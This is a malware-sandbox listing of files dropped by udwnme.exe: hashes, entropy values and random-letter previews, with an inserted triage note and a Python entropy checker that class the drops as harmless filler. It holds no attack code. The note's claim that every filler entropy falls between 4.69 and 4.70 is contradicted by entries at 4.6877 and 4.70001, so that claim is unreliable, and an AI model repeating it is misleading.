                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
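Triage note, added here as a worked example and not part of the Joe Sandbox output: every 1026-byte file dropped by udwnme.exe in this listing reports an 8-bit entropy between 4.69 and 4.70, which is log2(26) = 4.7004, the entropy of uniformly random uppercase letters. Together with the all-A-Z previews and the single CRLF terminator (1024 letters + 2 bytes), this marks them as random-text filler rather than encrypted or packed payloads, which is consistent with the report's own "Encrypted:false". The 282-byte UTF-16 file is a desktop.ini ([.ShellClassInfo] with LocalizedResourceName and IconResource), the standard Windows folder-customization file, and should not be read as a payload either. The script below recomputes the sandbox's entropy figure from raw bytes, checks reported values against log2(26), and buckets a file into the two categories seen here. The filler sample is constructed with a seeded PRNG and the desktop.ini bytes are rebuilt from the decoded preview above; both are labelled in the code and neither is a real sample from the analysis.

```python
"""Triage helper for the dropped-file listing (added example, not report code).

Joe Sandbox's "Entropy (8bit)" is the Shannon entropy of the byte histogram in
bits per byte, so a file of uniformly random uppercase letters sits at
log2(26) = 4.7004 bits/byte. Everything below runs offline on constructed data.
"""
import math
import random
from collections import Counter

UPPER = frozenset(b"ABCDEFGHIJKLMNOPQRSTUVWXYZ")
EXPECTED_UPPER = math.log2(26)  # 4.7004 bits/byte for uniform A-Z


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the same quantity as "Entropy (8bit)"."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def matches_uniform_alphabet(entropy: float, alphabet_size: int = 26,
                             tol: float = 0.02) -> bool:
    """True when a reported entropy is what uniform draws from `alphabet_size`
    symbols (plus a trailing line ending) would produce."""
    return abs(entropy - math.log2(alphabet_size)) <= tol


def classify(data: bytes) -> str:
    """Bucket a dropped file into the categories seen in the listing:
    'random-uppercase-filler' for A-Z junk ending in CRLF,
    'desktop.ini' for a BOM-prefixed UTF-16LE [.ShellClassInfo] file,
    'utf16le-text' for other BOM-prefixed UTF-16LE text, else 'other'."""
    body = data.rstrip(b"\r\n")
    if body and set(body) <= UPPER and matches_uniform_alphabet(
            shannon_entropy(data), tol=0.05):
        return "random-uppercase-filler"
    if data.startswith(b"\xff\xfe"):
        text = data[2:].decode("utf-16-le", errors="replace")
        return "desktop.ini" if "[.ShellClassInfo]" in text else "utf16le-text"
    return "other"


def make_filler(seed: int, letters: int = 1024) -> bytes:
    """Constructed stand-in for the 1026-byte dropped files: `letters`
    pseudo-random A-Z bytes followed by CRLF. Not a real sample."""
    rng = random.Random(seed)
    return bytes(rng.choice(b"ABCDEFGHIJKLMNOPQRSTUVWXYZ")
                 for _ in range(letters)) + b"\r\n"


# The 282-byte UTF-16LE file from the listing, rebuilt from its decoded
# preview: BOM, an empty first line, then three INI lines with CRLF endings.
DESKTOP_INI_TEXT = (
    "\r\n[.ShellClassInfo]\r\n"
    "LocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21769\r\n"
    "IconResource=%SystemRoot%\\system32\\imageres.dll,-183\r\n"
)
DESKTOP_INI_BYTES = b"\xff\xfe" + DESKTOP_INI_TEXT.encode("utf-16-le")

# Entropy values copied from the listing above, for the reported-value check.
REPORTED_FILLER_ENTROPIES = [4.699434772658264, 4.695685570184741,
                             4.701757898321461, 4.692693183518806]
REPORTED_DESKTOP_INI_ENTROPY = 3.514693737970008


if __name__ == "__main__":
    sample = make_filler(seed=1)
    print(len(sample), round(shannon_entropy(sample), 4), classify(sample))
    print(len(DESKTOP_INI_BYTES), round(shannon_entropy(DESKTOP_INI_BYTES), 4),
          classify(DESKTOP_INI_BYTES))
    for value in REPORTED_FILLER_ENTROPIES:
        print(value, matches_uniform_alphabet(value))
```

The reported values sit a few thousandths either side of 4.7004 rather than exactly on it: a plug-in entropy estimate over 1024 draws from 26 symbols is biased low by roughly (k-1)/(2N ln 2), about 0.018 bit, and the two line-ending bytes add back about 0.02 bit, so a tolerance of 0.02 around log2(26) separates these files from the desktop.ini (3.51) and from anything packed or encrypted (typically above 7).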
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
